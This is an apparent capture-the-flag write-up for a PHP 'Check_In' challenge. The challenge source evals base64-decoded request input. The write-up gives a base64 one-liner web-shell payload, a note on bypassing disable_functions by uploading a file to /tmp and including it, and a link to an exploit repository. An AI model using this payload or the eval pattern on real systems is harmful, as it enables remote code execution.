Check_In

<title>Check_In</title>
<?php
highlight_file(__FILE__);
class ClassName
{
        public $code = null;
        public $decode = null;
        function __construct()
        {
                $this->code = @$this->x()['Ginkgo'];
                $this->decode = @base64_decode( $this->code );
                @Eval($this->decode);
        }
        public function x()
        {
                return $_REQUEST;
        }
}
new ClassName();

一句话

url?Ginkgo=ZXZhbCgkX1BPU1RbJ29hdG1lYWwnXSk7

/readflag，需要绕过disable_function，上传文件到/tmp/ 目录后包含

https://github.com/mm0r1/exploits